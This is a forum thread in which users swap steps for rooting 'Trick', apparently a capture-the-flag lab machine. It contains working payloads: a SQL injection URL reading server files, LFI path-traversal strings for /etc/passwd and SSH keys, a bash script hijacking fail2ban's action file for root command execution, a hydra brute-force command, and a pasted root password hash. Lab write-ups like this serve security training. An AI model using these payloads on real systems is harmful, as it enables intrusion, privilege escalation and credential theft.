Posts: 104 Threads: 0 Joined: N/A (June 20, 2022, 05:29 PM)r46j Wrote: Hello,
Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine?
Please can anyone help me.
michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf
```
rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'?
``` user Michael and action.d hash same group ( security ) You can delete/rename/move/create file in action.d group Posts: 4 Threads: 0 Joined: N/A (June 20, 2022, 05:31 PM)hacker1111 Wrote: (June 20, 2022, 05:29 PM)r46j Wrote: Hello,
Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine?
Please can anyone help me.
michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf
```
rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'?
```
user Michael and action.d hash same group ( security )
You can delete/rename/move/create file in action.d group Thanks, got an root access. Posts: 22 Threads: 0 Joined: N/A (June 20, 2022, 06:31 PM)r46j Wrote: (June 20, 2022, 05:31 PM)hacker1111 Wrote: (June 20, 2022, 05:29 PM)r46j Wrote: Hello,
Michael user account doesn't have permission to modify iptables-multiport.conf, any other way to root this machine?
Please can anyone help me.
michael@trick:/tmp$ rm /etc/fail2ban/action.d/iptables-multiport.conf
```
rm: remove write-protected regular file '/etc/fail2ban/action.d/iptables-multiport.conf'?
```
user Michael and action.d hash same group ( security )
You can delete/rename/move/create file in action.d group
Thanks, got an root access. how was your step by step to access root? ☠ fuck ☠ Posts: 24 Threads: 0 Joined: N/A June 20, 2022 at 10:47 PM should work#!/bin/bashfile="/etc/fail2ban/action.d/iptables-multiport.conf"fs=$(cat "$file")rm -f /etc/fail2ban/action.d/iptables-multiport.conftouch /tmp/flag.txtres=$(echo "$fs" | sed "s/ -I f2b- 1 -s -j / cat \/root\/root.txt >> \/tmp\/flag.txt /g") # instead of "cat \/root\/root.txt > \/tmp\/root.txt" u can use ur own payloadecho "$res" >> /etc/fail2ban/action.d/iptables-multiport.confsudo /etc/init.d/fail2ban restartsleep 15echo "Done! Brute ssh now! Leave ur hydra or whatever u use just for 1min to work. Check /tmp/flag.txt after" Posts: 30 Threads: 0 Joined: N/A okk! , this is the most basic way to get root privileges for this device in case you don't know how fail2ban works, a bit s-kiddie but it will save you time in getting the root shell:--> script : https://github.com/rvizx/fail2ban/blob/main/fail2ban.py (thank to rvizx)--> at Trick machine : python3 fail2ban.py--> wait for the message "[!] bash -p will be executed in 100s" then run hydra at local : hydra -l root -P rockyou.txt ssh===>You will get root shell in a few minutes.and here is the root hash for those interested in learning:root:$6$lbBzS2rUUVRa6Erd$u2u317eVZBZgdCrT2HViYv.69vxazyKjAuVETHTpTpD42H0RDPQIbsCHwPdKqBQphI/FOmpEt3lgD9QBsu6nU1:19104:0:99999:7::: Posts: 73 Threads: 0 Joined: N/A (June 21, 2022, 07:48 AM)Mefistogr Wrote: @z3r0Day
This link
"--> script : https://github.com/rvizx/fail2ban/blob/main/fail2ban.py
..gives a 404 error Just because the repository has been updated and switched from Python to Bash. Here you have all detail but just "bon sens" should be enough: https://github.com/rvizx/fail2ban/ Posts: 5 Threads: 0 Joined: N/A (June 19, 2022, 12:51 PM)fironeDerbert Wrote: New subdomain: http://preprod-marketing.trick.htb
And LFI !
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
Take the id_rsa and get the SSH :D The LFI is not working for me. I can get files in the same folder, but not anything else. Is there a trick to it? Edit: nevermind I've worked out what I was doing wrong Posts: 8 Threads: 0 Joined: N/A (June 20, 2022, 05:23 PM)hacker1111 Wrote: (June 20, 2022, 02:02 PM)wienerpeter Wrote: hey guys how did you get the second subdomain
marketing one!
view-source:http://preprod-payroll.trick.htb/manage_employee.php?id=-1+union+select+1,2,load_file('/etc/nginx/sites-available/default'),4,5,6,7,8
I like this one, very nice! Posts: 20 Threads: 0 Joined: N/A (June 22, 2022, 02:25 AM)l3arner3D Wrote: (June 19, 2022, 12:51 PM)fironeDerbert Wrote: New subdomain: http://preprod-marketing.trick.htb
And LFI !
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
Take the id_rsa and get the SSH :D
The LFI is not working for me. I can get files in the same folder, but not anything else. Is there a trick to it?
Edit: nevermind I've worked out what I was doing wrong I'm stuck on the same thing? How did you figure it out? Posts: 15 Threads: 0 Joined: N/A June 23, 2022 at 10:23 PM (June 19, 2022, 12:51 PM)fironeDerbert Wrote: New subdomain: http://preprod-marketing.trick.htb
And LFI !
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
Take the id_rsa and get the SSH :D I have found LFI and have done the same. Just 'curl http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd' then intercepted burp request and modified '=....//..../....//etc/passwd' but it didn't work. String in respone <script>$('.nav-....//....//....//etc/passwd').addClass('active')</script> alarms me a little bit |
